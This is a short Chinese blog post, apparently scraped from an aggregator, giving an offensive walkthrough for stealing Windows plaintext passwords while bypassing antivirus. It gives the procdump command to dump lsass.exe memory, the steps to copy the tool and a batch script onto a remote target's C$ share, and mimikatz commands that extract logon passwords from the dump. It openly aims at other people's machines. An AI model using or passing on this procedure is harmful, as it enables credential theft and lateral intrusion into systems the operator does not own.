利用procdump+Mimikatz 绕过杀软获取Windows明文密码
来源:互联网 发布:江苏省人工智能会议 编辑:程序博客网 时间:2024/04/28 12:42
win2008装了360, 居然把我手里的破玩意全剿灭了, 这时, 这个方法来了!
Procdump: http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
命令如下:
1
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
我们运行mimikatz--第二版的平台(platform)要与进行dump的系统(source dump)兼容,兼容性如下:
得到dump后的文件我们就能使用mimikatz获取密码了。我们dump自己的电脑当然没什么意思,下面介绍怎么dump别人的电脑。
接下来我们可以在目标主机上开展工作了。
copy c:\temp\procdump.exe \\TARGETBOX\C$\Temp
copy c:\temp\procdump.bat \\TARGETBOX\C$\Temp
procdump.bat中的内容如下
1
2
@echooff
C:\temp\procdump.exe-accepteula-malsass.exe%COMPUTERNAME%_lsass.dmp
这里一个技巧就是dump得到的文件名中有“计算机名”,这样可以让我们区分是来dump的文件自哪台电脑。
1
2
3
4
mimikatz# sekurlsa::minidump SUPERCOMPUTER_lsass.dmp
SwitchtoMINIDUMP
mimikatz# sekurlsa::logonPasswords full
到此结束!我们得到了远程主机上的密码。
0 0
- 利用procdump+Mimikatz 绕过杀软获取Windows明文密码
- 利用procdump+Mimikatz 绕过杀软获取Windows明文密码
- 利用procdump+Mimikatz 绕过杀软获取Windows明文密码
- windows下获取系统管理员账号明文密码工具mimikatz使用
- mimikatz直接抓取 Windows 明文密码
- 神器 mimikatz - 直接抓取 Windows 明文密码
- mimikatz如何读取procdump的内容dump文件获得明文密码
- mimikatz抓取明文密码(Windows Server 2008 R2 x64)
- 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码!
- 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码!
- 利用mimikatz_trunk获取密码明文
- 获取Windows系统明文密码神器
- 【转】获取Windows系统明文密码神器
- 轻松获取windows 明文登录密码(入侵提权后)
- 用mimikatz来获取win7的密码
- 用mimikatz来获取win7的密码
- 躲避杀软抓取系统明文密码
- windows 绕过开机密码
- 抛开rails使用ActiveRecord连接数据库
- 【Jason's_ACM_解题报告】Ordering Tasks
- windows程序设计中10-3 POEPOEM程序无法运行
- 【Jason's_ACM_解题报告】Play on Words
- 欢迎使用CSDN-markdown编辑器
- 利用procdump+Mimikatz 绕过杀软获取Windows明文密码
- Python编写 随手记v1.0贺岁版 发布(开源)
- Tomcat 下部署工程
- 论文摘要的格式
- vmware 重新安装之问题 排除
- 【反射】反射的用途和作用
- Linux环境编程导引
- Leetcode: Valid Parentheses
- MIT 操作系统实验 MIT JOS lab4